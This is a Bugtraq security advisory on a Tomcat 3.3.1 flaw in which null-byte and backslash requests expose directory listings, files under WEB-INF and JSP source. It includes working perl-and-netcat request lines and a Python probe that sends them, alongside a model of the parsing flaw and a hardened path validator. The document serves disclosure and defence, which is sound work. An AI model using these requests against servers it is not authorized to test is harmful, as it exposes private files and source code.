89363 2003-01-30  18:49  /83 lines/ Jouko Pynnonen <jouko@solutions.fi>
Imported: 2003-01-30  18:49  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3316>
Subject: Apache Jakarta Tomcat 3 URL parsing vulnerability
------------------------------------------------------------



OVERVIEW
========

Tomcat is a JSP/Servlet implementation developed at the Apache
Software Foundation. Tomcat versions 3.3.1 and earlier contain
security vulnerabilities which allow a remote user to retrieve
directory listings even where an index.html or index.jsp file is
present. It is also possible to retrieve the contents of files and
directories that should not be visible from the outside, including
the source of JSP files.



DETAILS
=======

Certain kinds of HTTP requests containing binary null or backslash
characters are parsed incorrectly by Tomcat's built-in web server. The
following GET request causes Tomcat to output the directory listing of
the web root under a default installation:

GET /<null byte>.jsp HTTP/1.0

The following UNIX command can be issued to test the vulnerability:

$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080

If your server is vulnerable, the command will output an HTTP header
and the directory listing even if an index file is present.
Furthermore, a backslash can be used in the following way to get at
files in otherwise inaccessible directories:

$ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080

This will output the contents of ContextAdmin.java.

The servlet engine interprets the directory listing, and any file
retrieved in this way, as a JSP page, which might be exploited to run
arbitrary Java code in some scenarios. If the attacker can create a
file whose name contains JSP tags somewhere under the web root, the
code would be run when the directory listing is fetched in the way
described above. Similarly, Java code embedded in *.html or any other
file can be compiled and run by an attacker.

In the same way a remote user may force a *.jsp file to be
interpreted as plain HTML, i.e. retrieve the source of JSP files:

$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";' | nc my.server 8080

This would output the source of the example JSP file.
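The three requests above all exploit the same mismatch: the servlet engine picks a handler from the extension of the complete request string, while the file lookup underneath sees a string that stops at the first null byte (and, on a platform that accepts backslashes as separators, a different directory than the access check looked at). The following Python model of that mismatch, together with the path validation a fixed parser should perform, is an added example and is not Tomcat's code; the web root, the handler table, the single-separator access check and the behaviour of the native layer are simplifying assumptions chosen to reproduce the three cases in the advisory.

```python
import posixpath

# Assumed web root for illustration; not Tomcat's real layout.
WEBROOT = "/var/tomcat/webapps/ROOT"

# Directories a servlet container must never serve directly.
PROTECTED = {"WEB-INF", "META-INF"}


def handler_for(path: str) -> str:
    """Servlet-engine side of the model: choose a handler from the extension of
    the whole request string, null byte and all.  '/\\x00.jsp' therefore goes
    to the JSP handler and 'cal1.jsp\\x00.html' to the static-file handler."""
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    return {"jsp": "jsp", "html": "static", "htm": "static"}.get(ext, "default")


def legacy_is_protected(path: str) -> bool:
    """Model of an access check that only knows '/' as a separator: the
    segment 'WEB-INF\\classes' does not equal 'WEB-INF', so it passes."""
    return any(seg.upper() == "WEB-INF" for seg in path.split("/"))


def legacy_fs_path(path: str) -> str:
    """Model of the old file lookup (assumption: the native layer treats the
    name as a C string and stops at the first NUL, and the platform accepts
    '\\' as a directory separator as well)."""
    truncated = path.split("\x00", 1)[0].replace("\\", "/")
    return posixpath.normpath(WEBROOT + "/" + truncated.lstrip("/"))


def vulnerable_serve(path: str):
    """Return (handler, filesystem path), or None if the legacy check blocks it."""
    if legacy_is_protected(path):
        return None
    return handler_for(path), legacy_fs_path(path)


def hardened_resolve(path: str):
    """Validate the (already URL-decoded) path before any dispatch or file
    access.  Rejects NUL and backslash outright, normalises the path, checks
    protected directories segment by segment (case-insensitively, since the
    file system may be), and only then derives the handler from the
    normalised path, so dispatch and file lookup agree on the same name."""
    if "\x00" in path or "\\" in path:
        raise ValueError("control or backslash character in path")
    norm = posixpath.normpath("/" + path.lstrip("/"))   # collapses '.', '..', '//'
    if any(seg.upper() in PROTECTED for seg in norm.split("/")):
        raise ValueError("request for a protected directory")
    full = posixpath.normpath(WEBROOT + norm)
    # Cannot trigger after the leading-slash normalisation above; kept as
    # defence in depth for callers that pass a path they did not normalise.
    if full != WEBROOT and not full.startswith(WEBROOT + "/"):
        raise ValueError("path escapes the web root")
    return handler_for(norm), full


if __name__ == "__main__":
    for req in ("/\x00.jsp",
                "/admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp",
                "/examples/jsp/cal/cal1.jsp\x00.html"):
        print(repr(req), "legacy ->", vulnerable_serve(req))
        try:
            print(repr(req), "hardened ->", hardened_resolve(req))
        except ValueError as e:
            print(repr(req), "hardened -> rejected:", e)
```

Run as a script, the model shows the directory being handed to the JSP handler, the file under WEB-INF reaching the file system despite the check, and the JSP being handed to the static handler, while `hardened_resolve` refuses all three before any file is opened.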



SOLUTION
========

The vendor was informed on January 10, 2003. A new version of Tomcat
addressing this problem has been released. The fixed version 3.3.1a
and additional information are available at

  http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/

According to the vendor, the problem only affects Tomcat used with JDK 
1.3.1 or earlier.
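To check a server before and after the upgrade without reading the output of the nc commands by hand, the following Python probe, an added example and not part of the advisory or of Tomcat, sends each request from the advisory next to its well-formed counterpart and compares the two responses: `/` against `/<null>.jsp` (a 200 with a body different from the index page indicates a listing) and the rendered `cal1.jsp` against `cal1.jsp<null>.html` (scriptlet or directive tags in the second response but not the first indicate the JSP source). It assumes the example web application is installed and that the server is reachable on the host and port given on the command line; the sample responses at the bottom are constructed, not captured from a real server.

```python
import socket
import sys

# Request pairs: the first is a normal request used as the baseline, the
# second is its null-byte variant from the advisory.
PROBES = {
    "listing": ("/", "/\x00.jsp"),
    "jsp-source": ("/examples/jsp/cal/cal1.jsp",
                   "/examples/jsp/cal/cal1.jsp\x00.html"),
}


def build_request(path: str) -> bytes:
    """The same HTTP/1.0 request the perl|nc one-liners send; latin-1 keeps
    the raw NUL byte instead of percent-encoding it."""
    return b"GET " + path.encode("latin-1") + b" HTTP/1.0\r\n\r\n"


def parse_response(raw: bytes):
    """Return (status code, body); status 0 if the reply is not HTTP at all."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    status = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
    return status, body


def assess(kind: str, baseline_raw: bytes, probe_raw: bytes) -> str:
    bstat, bbody = parse_response(baseline_raw)
    pstat, pbody = parse_response(probe_raw)
    if pstat != 200:
        return "not served"          # malformed path was not answered with a page
    if kind == "jsp-source":
        # Rendered JSP output normally carries no '<%' tags; raw source does.
        return "likely vulnerable" if b"<%" in pbody and b"<%" not in bbody else "inconclusive"
    if kind == "listing":
        # '/' gave the index page; '/\x00.jsp' gave a different 200 page: a listing.
        return "likely vulnerable" if bstat == 200 and pbody != bbody else "inconclusive"
    raise ValueError(kind)


def fetch(host: str, port: int, path: str, timeout: float = 5.0) -> bytes:
    """Send one request and read until the server closes (HTTP/1.0 semantics)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(path))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def probe_server(host: str, port: int = 8080) -> dict:
    return {kind: assess(kind, fetch(host, port, base), fetch(host, port, probe))
            for kind, (base, probe) in PROBES.items()}


# Constructed sample responses (not captured from a real server) so that
# assess() can be exercised offline.
SAMPLE_INDEX = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                b"<html><body>Welcome</body></html>")
SAMPLE_LISTING = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  b"<html><body><a href=\"index.html\">index.html</a>"
                  b"<a href=\"examples/\">examples/</a></body></html>")
SAMPLE_RENDERED = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                   b"<html><body><table><tr><td>1</td></tr></table></body></html>")
SAMPLE_SOURCE = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                 b"<%@ page language=\"java\" %>\n"
                 b"<html><body><%= new java.util.Date() %></body></html>")
SAMPLE_ERROR = (b"HTTP/1.0 404 Not Found\r\nContent-Type: text/html\r\n\r\n"
                b"<html><body>Not Found</body></html>")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: probe.py host [port]")
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    for kind, verdict in probe_server(host, port).items():
        print(f"{kind}: {verdict}")
```

Comparing each probe with its baseline keeps the verdict independent of the exact markup of Tomcat's directory listing; a "not served" result after upgrading to 3.3.1a is the expected outcome, and "inconclusive" means the probe got a 200 that looked like the baseline, which deserves a look by hand.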



CREDITS
=======

The vulnerability was discovered by Jouko Pynnönen of Online Solutions 
Ltd, Finland.



-- 
Jouko Pynnonen          Online Solutions Ltd       Secure your Linux -
jouko@solutions.fi      http://www.solutions.fi    http://www.secmod.com